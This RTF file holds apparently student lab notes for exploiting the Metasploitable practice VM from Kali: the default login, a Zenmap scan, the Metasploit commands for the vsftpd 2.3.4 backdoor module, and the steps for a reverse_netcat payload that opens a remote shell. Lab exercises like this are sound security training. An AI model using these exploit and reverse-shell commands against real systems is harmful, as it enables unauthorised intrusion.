{\rtf1\ansi\ansicpg1252\cocoartf1561\cocoasubrtf200
{\fonttbl\f0\fnil\fcharset0 HelveticaNeue;}
{\colortbl;\red255\green255\blue255;\red53\green53\blue53;\red220\green161\blue13;}
{\*\expandedcolortbl;;\cssrgb\c27059\c27059\c27059;\cssrgb\c89412\c68627\c3922;}
\paperw11900\paperh16840\margl1440\margr1440\vieww10800\viewh8400\viewkind0
\deftab560
\pard\pardeftab560\slleading20\partightenfactor0

\f0\fs24 \cf2 Task 1\
For this task we will be using metasploitable and metasploit.\
\
1) Launch Metasploitable environment. Login information: name: msfadmin; password: msfadmin.\
\
2)Check IP address of Metasploitable. Using command: ifconfig\
Here we need to ensure that settings of virtual box is correct. The network must be nat network.\
Note down the IP address, for example 10.0.2.15 . We will use that later. \
\
3)Open Kali, open Zenmap. We\'92ll use this to find vulnerabilities. The other option is to do it manually.\
Enter the IP address we got from the last step in the target blank. Then click scan.\
\
4)When scan is finished, we can a list of vulnerabilities of the system, but we will mainly talk about the ftp backdoor.\
The version is vsftpd_234_backdoor\
\
5)Then let\'92s exploit! Ref: {\field{\*\fldinst{HYPERLINK "https://www.exploit-db.com/"}}{\fldrslt \cf3 https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor}}\
Open metasploit in Kali.\
Enter the following commands:\
use exploit/unix/ftp/vsftpd_234_backdoor\
show targets(Doesn\'92t work!)\
show options\
set RHOST (IP address of Metasploitable)\
exploit\
ifconfig (If the ip address is the same with that of Metasploitable, we\'92re in that network, yeah!!)\
\
\
Task 2\
This task is to create an interactive shell via netcat, which means that we can listen to other computers.\
\
1)We need to use the IP address of metasploit environment this time.\
2)Ref: {\field{\*\fldinst{HYPERLINK "https://www.rapid7.com/db/modules/payload/cmd/unix/reverse_netcat"}}{\fldrslt \cf3 https://www.rapid7.com/db/modules/payload/cmd/unix/reverse_netcat}}\
Use following commands.\
show payloads\
use payload/cmd/unix/reverse_netcat\
show options(LHOST IP is empty)\
set LHOST (IP address of Metasploit)\
exploit\
}